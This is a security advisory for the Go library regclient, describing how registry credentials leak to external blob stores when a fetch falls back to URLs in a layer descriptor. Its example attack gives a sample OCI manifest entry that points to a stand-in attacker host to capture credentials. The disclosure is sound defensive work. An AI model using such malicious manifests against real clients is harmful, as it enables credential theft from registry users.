GHSA-qvqc-4c52-x6qp
Suggest an improvement- Source
- https://github.com/advisories/GHSA-qvqc-4c52-x6qp
- Import Source
- https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2026/06/GHSA-qvqc-4c52-x6qp/GHSA-qvqc-4c52-x6qp.json
- JSON Data
- https://api.osv.dev/v1/vulns/GHSA-qvqc-4c52-x6qp
- Aliases
-
- CVE-2026-49349
- Downstream
- Related
- Published
- 2026-06-26T22:43:31Z
- Modified
- 2026-06-28T01:59:26.252953417Z
- Severity
-
- 6.8 (Medium) CVSS_V3 - CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:N/A:N CVSS Calculator
- Summary
- regclient may leak authentication credentials to external blob stores
- Details
-
Credentials for a registry may be inadvertently leaked to external servers. A prerequisite for this attack is a malicious registry server, a malicious blob store, or a registry that does not restrict the external URLs for foreign blobs.
Example attack
A malicious registry serves an OCI image manifest containing a layer descriptor with a
urlsfield pointing to an attacker controlled host:{ "mediaType": "application/vnd.oci.image.layer.v1.tar+gzip", "digest": "sha256:...", "size": 1024, "urls": ["https://malicious.example.org/blobs/sha256/..."] }When regclient fetches the image and the primary blob request to the registry fails, it falls back to the URLs in the layer descriptor. If the external server requests authentication, regclient would send the credentials for the original registry server.
Timeline
- 2026-05-25: Advisory submitted
- 2026-05-26: Fix released
Credit
Theodoros Lampropoulos, Threat Detection Engineer, Odyssey Cyber Security
- Database specific
{ "nvd_published_at": null, "cwe_ids": [ "CWE-522" ], "github_reviewed": true, "severity": "MODERATE", "github_reviewed_at": "2026-06-26T22:43:31Z" }- References
Affected packages
Go / github.com/regclient/regclient
Package
- Name
- github.com/regclient/regclient
- View open source insights on deps.dev
- Purl
- pkg:golang/github.com/regclient/regclient